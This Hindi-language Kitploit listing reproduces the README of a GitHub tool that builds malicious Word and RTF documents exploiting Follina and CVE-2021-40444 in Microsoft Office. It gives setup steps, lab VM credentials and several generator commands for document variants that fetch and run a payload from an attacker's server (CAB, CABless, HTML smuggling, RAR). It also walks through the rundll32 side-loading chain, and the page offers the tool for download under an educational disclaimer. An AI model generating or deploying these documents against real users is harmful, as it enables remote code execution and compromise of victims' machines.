Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Follina-CVE-and-CVE-2021-40444 — यह रिपॉजिटरी Microsoft Office में Follina CVE और CVE-2021-40444 कमजोरियों का शोषण करने के लिए स्क्रिप्ट्स और संसाधनों को शामिल करती है। स्क्रिप्ट्स दुर्भावनापूर्ण दस्तावेज़ फ़ाइलें उत्पन्न करती हैं जो लक्ष्य प्रणाली पर मनमाना कोड निष्पादित कर सकती हैं। | Kitploit
उपकरण/GitHubGitHub/basim-ahmad/follina-cve-and-cve-2021-40444
पेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणमालवेयर विश्लेषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubbasim-ahmad/follina-cve-and-cve-2021-40444

Follina-CVE-and-CVE-2021-40444

यह रिपॉजिटरी Microsoft Office में Follina CVE और CVE-2021-40444 कमजोरियों का शोषण करने के लिए स्क्रिप्ट्स और संसाधनों को शामिल करती है। स्क्रिप्ट्स दुर्भावनापूर्ण दस्तावेज़ फ़ाइलें उत्पन्न करती हैं जो लक्ष्य प्रणाली पर मनमाना कोड निष्पादित कर सकती हैं।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
2 साल पहलेअभी तक समीक्षित नहीं

Follina CVE और CVE-2021-40444 कमजोरियों का शोषण

विषय-सूची

  1. परिचय
  2. पूर्वापेक्षाएँ
  3. सेटअप और इंस्टॉलेशन
  4. उपयोग
  5. विस्तृत विवरण
  6. कमांड्स
  7. अस्वीकरण

परिचय

इस रिपॉजिटरी में Microsoft Office में Follina CVE और CVE-2021-40444 कमजोरियों का शोषण करने के लिए स्क्रिप्ट और संसाधन शामिल हैं। स्क्रिप्ट दुर्भावनापूर्ण दस्तावेज़ फ़ाइलें उत्पन्न करती हैं जो लक्षित सिस्टम पर मनमाना कोड निष्पादित कर सकती हैं।

पूर्वापेक्षाएँ

  • Flare VM
  • Python 3.x
  • Microsoft Word
  • आवश्यक Python पैकेज (requirements.txt में सूचीबद्ध)

सेटअप और इंस्टॉलेशन

  1. Flare VM सेटअप:

    • सुनिश्चित करें कि Flare VM स्थापित है। VM के लिए क्रेडेंशियल हैं:
      • उपयोगकर्ता नाम: lab
      • पासवर्ड: password
  2. Python और वर्चुअल वातावरण:

    root@kitploit:~
    git clone https://github.com/basim-ahmad/Follina-CVE-and-CVE-2021-40444.git
    cd CVE-2021-40444
    
    • सुनिश्चित करें कि वर्चुअल मशीन में Python और pip स्थापित हैं।
    • निम्न कमांड का उपयोग करके virtualenv पैकेज स्थापित करें:
      root@kitploit:~
      pip install virtualenv
      
    • venv नाम का वर्चुअल वातावरण बनाएं:
      root@kitploit:~
      python -m virtualenv venv
      
    • वर्चुअल वातावरण सक्रिय करें:
      root@kitploit:~
      venv\Scripts\activate.bat
      
    • आवश्यक पैकेज स्थापित करें:
      root@kitploit:~
      pip install -r requirements.txt
      

उपयोग

  1. एक्सप्लॉइट उत्पन्न करना:

    • प्रोजेक्ट निर्देशिका में जाएं और एक्सप्लॉइट उत्पन्न करने के लिए निम्न कमांड चलाएं:
      root@kitploit:~
      python generator.py -u http://192.168.197.132 -P test\calc.dll --host
      
      192.168.197.132 को अपने IP पते से बदलें।
  2. उत्पन्न दस्तावेज़ तक पहुँचना:

    • उत्पन्न .docx फ़ाइल निम्न निर्देशिका में स्थित होगी:
      root@kitploit:~
      C:\Users\Lab\Desktop\project\CVE-2021-40444\out\document.docx
      

विस्तृत विवरण

श्रृंखला शोषण

  • दस्तावेज़ (.docx) खोला जाता है।
  • दस्तावेज़ में एक relationship है जो document.xml.rels में संग्रहीत दुर्भावनापूर्ण HTML की ओर इशारा करता है।
  • HTML लिंक IE पूर्वावलोकन में खुलता है।
  • एक ऑब्जेक्ट CAB फ़ाइल की ओर और एक iframe INF फ़ाइल की ओर इशारा करता है, दोनों JScript में एम्बेडेड हैं और ".cpl:" निर्देश से उपसर्गित हैं।
  • CAB फ़ाइल खुलती है, INF फ़ाइल को %TEMP%Low निर्देशिका में सहेजती है।
  • INF फ़ाइल ".cpl:" निर्देश का उपयोग करके खोली जाती है, जिससे rundll32 INF फ़ाइल को साइड-लोड करता है।

स्क्रिप्ट्स का अवलोकन

generator.py

  • CVE-2021-40444 के लिए एक एक्सप्लॉइट लागू करता है, जो Microsoft Office के माध्यम से रिमोट कोड निष्पादन की अनुमति देता है।
  • इसमें CAB फ़ाइलों को पैच करने, RAR फ़ाइलें बनाने, पेलोड उत्पन्न करने आदि के लिए विभिन्न सहायक फ़ंक्शन शामिल हैं।

cab_parser.py

  • CAB फ़ाइल हेडर देखने के लिए एक उपकरण।
  • CAB फ़ाइलों को संभालने और पार्स करने के लिए क्लासेस और विधियाँ परिभाषित करता है।

अनुभाग 2.0: Flare VM में सेटअप

  • आवश्यक उपकरण और पैकेज स्थापित करें।
  • वर्चुअल वातावरण बनाएं और सक्रिय करें।
  • requirements.txt से Python पैकेज स्थापित करें।

कमांड्स

  • मूल एक्सप्लॉइट उत्पन्न करें और स्थानीय रूप से परीक्षण करें:
    root@kitploit:~
    python generator.py -u http://127.0.0.1 -P test\calc.dll --host
    
  • MS-MSDT (Follina हमले) का लाभ उठाते हुए CABless एक्सप्लॉइट उत्पन्न करें, DOCX और RTF दोनों दस्तावेज़ों में:
    root@kitploit:~
    python generator.py -u http://127.0.0.1 -P test\calc.ps1 --no-cab --host --convert
    
  • HTML स्मगलिंग के साथ CABless एक्सप्लॉइट (केवल IE) उत्पन्न करें और IE के माध्यम से स्थानीय रूप से परीक्षण करें:
    root@kitploit:~
    python generator.py -u http://127.0.0.1 -P test\calc.js --no-cab --host -t
    
  • RAR के साथ CABless एक्सप्लॉइट उत्पन्न करें और IE के माध्यम से स्थानीय रूप से परीक्षण करें:
    root@kitploit:~
    python generator.py -u http://127.0.0.1 -P test\job-jscript.wsf --no-cab --host -t
    

अस्वीकरण

यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों के लिए है। इसका जिम्मेदारी से उपयोग करें और उन सिस्टमों पर कमजोरियों का शोषण न करें जिनके परीक्षण की अनुमति आपके पास नहीं है। इस जानकारी का दुरुपयोग आपराधिक आरोपों का कारण बन सकता है।

टूल डाउनलोड करें